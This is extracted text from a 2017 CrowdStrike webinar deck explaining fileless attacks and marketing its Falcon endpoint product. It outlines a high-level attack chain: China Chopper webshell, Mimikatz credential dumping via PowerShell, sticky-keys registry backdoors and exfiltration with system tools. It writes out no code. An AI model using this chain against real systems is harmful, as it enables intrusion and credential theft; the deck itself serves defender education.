2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
WHO NEEDS MALWARE?
UNDERSTANDING FILELESS ATTACKS AND HOW TO STOP THEM
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
1 What are fileless attacks
2 How does a fileless attack work
3 Real world examples
4 Why traditional approaches don’t work
5 The CrowdStrike approach
POOL QUESTION
HOW WOULD YOU RATE YOUR KNOWLEDGE OF FILELESS ATTACKS 1 TO 5 (1 = NONE. 5 = EXPERT)
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
WHAT IS A FILELESS ATTACK
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
An attack that does not require a malicious executable file
to be written to disk
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
THE REALITY OF FILELESS ATTACKS
Fileless techniques are not new
More prevalent than Ransomware 24% vs. 21%
78% of organizations are concerned about fileless attacks
Only 51% of breaches include malware - Source Verizon BDR 2017
Not all attacks are 100% fileless
80% of attacks use some fileless techniques - Source CrowdStrike Incident Response
FILELESS ATTACK TECHNIQUES
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
FILELESS
TECHINQUES
FILELESS INTRUSION TECHNIQUES OBSERVED BY THE FALCON PLATFORM
§ Spear phishing for credentials
§ Lateral movement using ‘living off the land’ tools (WMI, Unix commands, Powershell)
§ Registry persistence
§ Webshells
2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
1.Attackeridentifiesorganizationwithvulnerable
webapplication
2.RemoteattackerusesSQLinjectionorother
vulnerabilitytodroppayload
3. Vulnerable webserver is
compromised and becomes
backdoor
WEBSHELL ATTACKS
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
FILELESS
TECHINQUES
FILELESS INTRUSION TECHNIQUES OBSERVED BY THE FALCON PLATFORM
§ Spear phishing for credentials
§ Lateral movement using ‘living off the land’ tools (WMI, Unix commands, Powershell)
§ Registry persistence
§ Webshells
§ Powershell-based credential dumpers
GOAL
TOOL S
T E C H N I Q U E
HOW A FILELESS ATTACK TAKES PLACE
I N I T I A L C O M P R O M I S E
1
Remote access to a system using a
web browser. Can be web scripting
languageE.g. China Chopper
GAIN ACCESS
WebShell
C O M M A N D A N D C O N T R O L
2
Run system commands to
find out where we are
RECON
Sysinfo, Whoami
P R I V I L E G EE S C A L AT I O N
3
Run a PowerShell script such as
Mimikatz to dump credentials
DUMP CREDENTIALS
PowerShell
P E R S I S T E N C E
4
Modifies Registry to create a backdoor
E.g. On screen keyboard or sticky keys
MAINTAIN PERSISTENCE
Registry
E X F I LT R AT I O N
5
Uses system tools to gather data and
China Chopper Webshell to
exfiltrate data
EXFILTRATE DATA
VSSAdmin, Copy, NET use,
Webshell
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
REAL WORLD EXAMPLES
§ Fileless Malwre: Kovter
§ Fileless Attack: Nation State
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
KOVTER
§ Click-fraud
§ Fileless after initial infection
§ Hides encrypted malicious modules in the registry
§ Hides other malicious modules in PowerShell scripts
§ Uses shortcut file (.lnk) to download PowerShell scripts. The script launches PowerShell to start a shellcode
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
NATION STATE ATTACK
§ Weaponization: Spoofed website
§ Delivery: Spear phishing
§ PowerShell modules connect to a remote server
§ Install/run MimiKatz
§ Lateral movement through stolen credentials
MOVING LATERALLY WITHOUT MALWARE
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
Attacker sets the bait with a fake
website
Extract credentials from initial victim
Move laterally to other hosts
HOW TO PROTECT AGAINST FILELESS ATTACKS
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
HOW WOULD YOU RATE YOUR CURRENT LEVEL OF PROTECTION AGAINST FILELESS ATTACKS (1 = POOR – 5 = EXCELLENT)
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
EDUCATE
83%Rate traditional AV based signature efficacy good or excellent
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
WHY TRADITIONAL APPROACHES DON’T WORK
No file to analyze No artifacts left behind Blind if prevention fails
Uses legitimate applications No file to detonate Hands on keyboard
PROTECTS AGAINST ALL TYPES OF ATTACKSProtect against Known/Unknown Malware/Malware Free
Protect Against Zero-Day Attacks
Endpoint Detection and Response
Managed Threat Hunting
BENEFITS
FALCON ENDPOINT PROTECTION
MachineLearning
IOABehavioral
Blocking
Block Known Bad
ExploitMitigation
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
PROCESSINJECTSATHREADINTOSYSTEMPROCESS
INJECTEDTHREADREADSCREDENTIALSFROMTHESYSTEMPROCESSMEMORY
DUMPEDCREDENTIALSAREUSEDTOLOGININTOEXCHANGESERVER
MAILBOXESAREEXPORTEDOUTOFEXCHANGE
INDICATORS OF ATTACK
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
PROCESSCONDUCTSRECONNAISSANCE
PROCESSELEVATESPRIVILEGES
WEBSERVEREXECUTESAPROCESS
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
KEY TAKEAWAYS
THE THREAT IS REAL TRADITIONAL AV IS NOT ENOUGH CURRENT DEFENSES
DO NOT WORK
NEED TO THINK BEYOND MALWARE AND FOCUS ON
STOPPING THE BREACH
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
Questions?Please submit all questions in the Q&A chat
right below the presentation slides
Contact Us
Additional Information
JoinWeeklyDemos
crowdstrike.com/productdemos
FeaturedAsset:HowAdversariesUseFileless AttacksTo
EvadeYourSecurity
Link in Resource List
Website: crowdstrike.comEmail: [email protected]: 1.888.512.8902 (US)